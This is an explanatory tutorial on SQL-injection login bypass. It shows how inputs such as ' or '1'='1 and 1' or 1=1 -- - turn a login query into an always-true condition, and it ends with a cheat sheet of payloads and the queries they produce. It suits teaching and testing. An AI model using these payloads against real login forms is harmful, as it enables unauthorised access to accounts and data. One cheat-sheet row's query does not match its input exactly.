Executed SQL query when username is tom and password is tom:
SELECT * FROM users WHERE name='tom' and password='tom'When a user enters a user name and password, a SQL query is
created and executed to search on the database to verify them.
The above query searches in the users table where name is tom
and password is tom. If matching entries are found, the user is
authenticated.
In order to bypass this security mechanism, SQL code has to be
injected on to the input fields. The code has to be injected in such
a way that the SQL statement should generate a valid result upon
execution. If the executed SQL query has errors in the syntax,
it won't featch a valid result. So filling in random SQL commands
and submitting the form will not always result in succesfull authentication.
Executed SQL query when username is tom and password is a single quote:
SELECT * FROM users WHERE name='tom' and password='''The above query is not going yield any results as it is not a valid query.
If the web page is not filtering out the error messages, you will be able
to see an error message on the page. The trick is not make the query
valid by putting proper SQL commands on place.
Executed SQL query when username is tom and password is ' or '1'='1:
SELECT * FROM users WHERE name='tom' and password='' or '1'='1'If the username is already known, the only thing to be bypassed is the
password verification. So, the SQL commands should be fashioned in
the similar way.
The password='' or '1'='1' condition is always true, so the password
verification never happens. It can also be said that the above statement
is more or less equal to
SELECT * FROM users WHERE name='tom'
SELECT * FROM users WHERE name='tom'
That is just one of the possibility. The actual exploit is limited only
by the imagination of the tester. Let's see another possibility.
Executed SQL query when username is tom and password is ' or 1='1:
SELECT * FROM users WHERE name='tom' and password='' or 1='1'The password='' or 1='1' condition is also always true just like in the first
case and thus bypasses the security.
The above two cases needed a valid username to be supplied. But that is
not necesserily required since the username field is also vulnerable to SQL injection attacks.
Executed SQL query when username is ' or '1'='1 and password is ' or '1'='1:
SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.
Executed SQL query when username is ' or ' 1=1 and password is ' or ' 1=1:
SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'The above query is also more or less similar to the previously executed query and is a possible way to get authenticated.
Cheat sheet
User name | Password | SQL Query |
---|---|---|
tom | tom | SELECT * FROM users WHERE name='tom' and password='tom' |
tom | ' or '1'='1 | SELECT * FROM users WHERE name='tom' and password='' or '1'='1' |
tom | ' or 1='1 | SELECT * FROM users WHERE name='tom' and password='' or 1='1' |
tom | 1' or 1=1 -- - | SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -' |
' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
1' or 1=1 -- - | blah | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah' |